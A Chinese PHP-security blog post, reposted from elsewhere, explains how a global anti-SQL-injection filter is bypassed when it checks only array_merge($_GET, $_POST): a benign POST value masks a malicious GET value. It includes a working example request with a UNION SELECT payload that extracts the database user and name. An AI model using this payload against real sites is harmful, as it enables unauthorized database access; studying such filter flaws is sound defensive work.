最新消息:

360爆出的某防注程序绕过

php安全 admin 1591浏览 0评论

4e4a20a4462309f76b52a7b8700e0cf3d7cad65f1

$_PG=array_merge($_GET,$_POST);

该 处采用array_merge函数合并$_GET,$_POST二个数组,如果$_GET,$_POST键名有重复,那么$_PG中该键的键值 为$_POST中键名对应的值,如$_GET[‘typeid’]=union select、$_POST[‘typeid’]=111,则$_PG[‘typeid’]=111,

而下面用pb_attack_filter函数仅对$_PG进行过滤,倘若程序中对$_GET处理不当,全局过滤将失效。

 

9825bc315c6034a80226b32bc913495408237657

 

http://localhost/product.php?typeid=-1 UNION SELECT 1,2,3,4,concat(user(),0x37c,database()),6,7,8%23

post:typeid=11

500fd9f9d72a60592a4aebb02a34349b023bbac5

$_PG=array_merge($_GET,$_POST);后$_PG的值已经是11了,而$_GET[‘typeid’]是-1  UNION SELECT1,2,3,4,concat(user(),0x37c,database()),6,7,8%23 全局防注入已经绕过了。

转自:http://hi.baidu.com/seo0775/item/01d857a36d7ab7ab29ce9d80?qq-pf-to=pcqq.group

本文隐藏内容 登陆 后才可以浏览

转载请注明:jinglingshu的博客 » 360爆出的某防注程序绕过

发表我的评论
取消评论

表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址